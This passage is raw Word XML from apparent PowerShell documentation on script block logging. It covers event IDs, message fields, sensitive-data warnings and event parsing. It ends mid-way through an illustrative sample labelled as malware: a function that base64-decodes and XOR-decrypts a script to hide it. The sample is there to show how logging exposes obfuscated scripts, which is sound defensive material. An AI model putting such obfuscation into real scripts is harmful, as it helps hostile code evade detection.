          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Opcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="272"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>CommandStart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="257"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Runspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="1076"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r>
              <w:t xml:space="preserve"> Creating</w:t>
            </w:r>
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Scriptblock text</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (%1 of %2):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r>
              <w:t xml:space="preserve"> %3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1"/>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r>
              <w:t xml:space="preserve"> ScriptBlock ID: %4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="006F74E8"/>
    <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="006F74E8">
      <w:r>
        <w:t xml:space="preserve">The text embedded in the message </w:t>
      </w:r>
      <w:r w:rsidR="003C0EF7">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005F6DEF">
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the script block compiled. The </w:t>
      </w:r>
      <w:r w:rsidR="00F12D80">
        <w:t xml:space="preserve">ScriptBlock </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidR="00226BF9">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a GUID retained for the life of the script block. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="006F74E8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D7703A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BA481C">
        <w:t xml:space="preserve">Some script block texts (i.e.: </w:t>
      </w:r>
      <w:r w:rsidR="00BA481C" w:rsidRPr="00BA481C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get-ChildItem</w:t>
      </w:r>
      <w:r w:rsidR="00BA481C">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">might not </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7703A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>truly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be representative of its underlying functionality if that </w:t>
      </w:r>
      <w:r w:rsidR="00BA481C">
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:t>was generated through PowerShell’s dynamic keyword mechanism</w:t>
      </w:r>
      <w:r w:rsidR="00BA481C">
        <w:t xml:space="preserve"> or an overridden function</w:t>
      </w:r>
      <w:r>
        <w:t>. For both of these situations, the original dynamic keyword definition (or malicious function definition) will be logged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="006F74E8">
      <w:r>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r w:rsidR="006C5C2B">
        <w:t xml:space="preserve">script block invocation logging is enabled, PowerShell also </w:t>
      </w:r>
      <w:r>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidR="006C5C2B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> begin and end </w:t>
      </w:r>
      <w:r w:rsidR="006C5C2B">
        <w:t xml:space="preserve">event </w:t>
      </w:r>
      <w:r>
        <w:t>markers:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1005"/>
        <w:gridCol w:w="5099"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5C2B" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006C5C2B" w:rsidRPr="00866A12" w:rsidRDefault="006C5C2B" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>EventId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006C5C2B" w:rsidRPr="00614730" w:rsidRDefault="00614730" w:rsidP="00BA72F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Start: 4105 / </w:t>
            </w:r>
            <w:r w:rsidR="006C5C2B" w:rsidRPr="00592EC6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x1009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="001F3032">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Complete: 4106 / 0x100A</w:t>
            </w:r>
            <w:r w:rsidR="001F3032">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Opcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Open (/ Close)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>CommandStart (/ CommandStop)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Runspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r>
              <w:t xml:space="preserve"> Started (/ Completed) invocation of ScriptBlock ID: %1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r>
              <w:t xml:space="preserve"> Runspace ID: %2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005D400F" w:rsidRDefault="00F54E9D" w:rsidP="00141DD8">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006F74E8">
        <w:t xml:space="preserve">The ID </w:t>
      </w:r>
      <w:r w:rsidR="000E5DE9">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="006F74E8">
        <w:t xml:space="preserve">the GUID representing the script block (that can be correlated with event ID </w:t>
      </w:r>
      <w:r w:rsidR="00634721">
        <w:t>4104</w:t>
      </w:r>
      <w:r w:rsidR="006F74E8">
        <w:t>), and the Runspace ID represents the runspace this script block was run in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B2521" w:rsidRDefault="003B2521" w:rsidP="00141DD8">
      <w:r>
        <w:t xml:space="preserve">Given that it represents the content of all PowerShell script invoked on a system, these events may contain sensitive data. </w:t>
      </w:r>
      <w:r w:rsidR="00C85F99">
        <w:t xml:space="preserve">To limit the information disclosure risk when script block logging is enabled, see </w:t>
      </w:r>
      <w:r w:rsidR="009C6EA4" w:rsidRPr="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009C6EA4" w:rsidRPr="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref416017909 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="009C6EA4" w:rsidRPr="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="009C6EA4" w:rsidRPr="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001E1DF8" w:rsidRPr="001E1DF8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:t>Protected Event Logging</w:t>
      </w:r>
      <w:r w:rsidR="009C6EA4" w:rsidRPr="009B38C8">
        <w:rPr>
          <w:rStyle w:val="SubtleEmphasis"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C85F99">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:r>
        <w:t xml:space="preserve">Percent signs in the invocation message represent structured ETW properties. While they are replaced with the actual values in the message text, a more robust way to access them is to retrieve the message with the </w:t>
      </w:r>
      <w:r w:rsidRPr="004829B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get-WinEvent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cmdlet, and then use the </w:t>
      </w:r>
      <w:r w:rsidRPr="007177D4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> array of the message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Here's an example of how this functionality can help unwrap a malicious attempt to encrypt and obfuscate a script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00008B"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="8A2BE2"/>
        </w:rPr>
        <w:t>SuperDecrypt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00008B"/>
        </w:rPr>
        <w:t>param</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$script</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>Convert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:r>
        <w:t>FromBase64String(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$script</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="006400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## XOR “encryption”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$xorKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>0x42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00008B"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$counter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$counter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>-lt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Length; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A9A9A9"/>
        </w:rPr>
        <w:t>-bxor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF4500"/>
        </w:rPr>
        <w:t>$xorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60C36" w:rsidRDefault="00B60C36" w:rsidP="00B60C36">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
